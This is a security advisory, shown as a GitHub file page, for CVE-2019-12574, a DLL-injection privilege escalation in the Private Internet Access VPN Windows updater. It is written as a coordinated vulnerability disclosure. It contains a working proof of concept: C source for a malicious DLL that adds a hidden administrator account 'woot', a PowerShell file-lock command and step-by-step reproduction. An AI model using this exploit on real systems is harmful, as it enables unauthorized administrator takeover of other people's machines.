Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12574.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
205 lines (140 sloc)
6.97 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Windows Privilege Escalation: DLL Injection | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12574 | |
| Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client v1.0 for Windows could allow an authenticated, local attacker to run | |
| arbitrary code with elevated privileges. | |
| The PIA Desktop client is vulnerable to a DLL injection vulnerability during | |
| the update process. The updater loads several DLLs from a folder that | |
| authenticated users have write access to. A low privileged user can leverage | |
| this vulnerability to execute arbitrary code as an administrator. | |
| When an update is available a low privilege user is notified in the client and is | |
| presented with the option to download it. When clicked, the PIA client sends a | |
| command to the PIA service to download the update. The update is staged in | |
| "C:\ProgramData\Private Internet Access\update\". This directory and all files | |
| within it are removed prior to storing the update file. | |
| A low privileged user can create a file in the update directory and set a lock on | |
| it which prevents the PIA service from deleting it during the download process. | |
| This can be leveraged to stage a malicious DLL that the update process will load. | |
| The next time an administrator opens the PIA client a new option to install the | |
| latest version will be available. When clicked, the updater will install the update | |
| and silently execute arbitrary code as the administrator. This PoC will demonstrate | |
| that a new administrator named "woot" will be added during the update process. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R | |
| Base: 6.7 | |
| Temporal: 6.3 | |
| The following DLLs are loaded by the pia-windows-x64-1.0-02176.exe | |
| C:\ProgramData\Private Internet Access\update\spinf.dll | |
| C:\ProgramData\Private Internet Access\update\USERENV.dll | |
| C:\ProgramData\Private Internet Access\update\newdev.dll | |
| C:\ProgramData\Private Internet Access\update\DEVRTL.dll | |
| C:\ProgramData\Private Internet Access\update\DEVOBJ.dll | |
| C:\ProgramData\Private Internet Access\update\drvstore.dll | |
| C:\ProgramData\Private Internet Access\update\PROPSYS.dll | |
| C:\ProgramData\Private Internet Access\update\LINKINFO.dll | |
| C:\ProgramData\Private Internet Access\update\ntshrui.dll | |
| C:\ProgramData\Private Internet Access\update\SspiCli.dll | |
| C:\ProgramData\Private Internet Access\update\srvcli.dll | |
| C:\ProgramData\Private Internet Access\update\cscapi.dll | |
| C:\ProgramData\Private Internet Access\update\CLDAPI.dll | |
| C:\ProgramData\Private Internet Access\update\FLTLIB.DLL | |
| C:\ProgramData\Private Internet Access\update\apphelp.dll | |
| C:\ProgramData\Private Internet Access\update\netutils.dll | |
| Permissions of "c:\ProgramData\Private Internet Access" showing | |
| that BUILTIN\Users has write access. | |
| c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F | |
| BUILTIN\Administrators:(OI)(CI)(ID)F | |
| CREATOR OWNER:(OI)(CI)(IO)(ID)F | |
| BUILTIN\Users:(OI)(CI)(ID)R | |
| BUILTIN\Users:(CI)(ID)(special access:) | |
| FILE_WRITE_DATA | |
| FILE_APPEND_DATA | |
| FILE_WRITE_EA | |
| FILE_WRITE_ATTRIBUTES | |
| Permissions of "c:\ProgramData\Private Internet Access\update" showing | |
| that the test1 user has full access(see step 2). | |
| c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F | |
| BUILTIN\Administrators:(OI)(CI)(ID)F | |
| CHAOS\test1:(ID)F | |
| CREATOR OWNER:(OI)(CI)(IO)(ID)F | |
| BUILTIN\Users:(OI)(CI)(ID)R | |
| BUILTIN\Users:(CI)(ID)(special access:) | |
| FILE_WRITE_DATA | |
| FILE_APPEND_DATA | |
| FILE_WRITE_EA | |
| FILE_WRITE_ATTRIBUTES | |
| Test Environment | |
| OS: Microsoft Windows 10 Pro 10.0.17763 N/A Build 17763 | |
| PIA Version: v0.9.9 beta | |
| PIA Upgrade Version: v1.0 | |
| Steps to reproduce | |
| All steps are executed as a low privileged user unless otherwise noted. | |
| 1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder. | |
| cd "c:\ProgramData\Private Internet Access" | |
| 2) Create the update folder and change to it. | |
| mkdir update | |
| cd update | |
| 3) Create a malicious library to create an administrator account named woot when loaded. | |
| /* Cross Compile with | |
| x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared | |
| */ | |
| #include <windows.h> | |
| BOOL WINAPI DllMain( | |
| HINSTANCE hinstDLL, | |
| DWORD fdwReason, | |
| LPVOID lpReserved ) | |
| { | |
| switch( fdwReason ) | |
| { | |
| case DLL_PROCESS_ATTACH: | |
| system("cmd /c net user woot insertpasswordhere /add"); | |
| system("cmd /c net localgroup administrators woot /add"); | |
| break; | |
| case DLL_THREAD_ATTACH: | |
| // Do thread-specific initialization. | |
| break; | |
| case DLL_THREAD_DETACH: | |
| // Do thread-specific cleanup. | |
| break; | |
| case DLL_PROCESS_DETACH: | |
| // Perform any necessary cleanup. | |
| break; | |
| } | |
| return TRUE; // Successful DLL_PROCESS_ATTACH. | |
| } | |
| 4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll | |
| as the target. | |
| copy woot.dll spinf.dll | |
| 5) Execute powershell and set a lock on the spinf.dll file to prevent the library | |
| from being deleted. I appreciate @poshkatz for teaching me how to easily lock files | |
| with PowerShell. | |
| $f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open [System.IO.FileAccess]::Read,[System.IO.FileShare]::Read) | |
| 6) Verify the lock by typing $f. The output should look like this. | |
| CanRead : True | |
| CanWrite : False | |
| CanSeek : True | |
| IsAsync : False | |
| Length : 287283 | |
| Name : c:\ProgramData\Private Internet Access\update\spinf.dll | |
| Position : 0 | |
| Handle : 880 | |
| SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle | |
| CanTimeout : False | |
| ReadTimeout : | |
| WriteTimeout : | |
| 7) Open the PIA client. An update will be available. Click Download v1.0.0. | |
| 8) Now that the update is staged, exit all windows and logout. | |
| 9) Login as an Administrator. | |
| 10) Open the PIA client and click the update icon in the upper right and then | |
| click the "Install v1.0.0" option. The update will install normally. | |
| 11) At this point the "woot" administrator account will exist. Open a cmd shell | |
| and verify. | |
| net user woot | |
| Timeline: | |
| 2019-01-13: Reported to vendor | |
| 2018-01-13: Vendor acknowledged receipt of report | |
| 2019-01-22: Vendor released fix in v1.0.1 | |
| 2019-06-10: Public disclosure |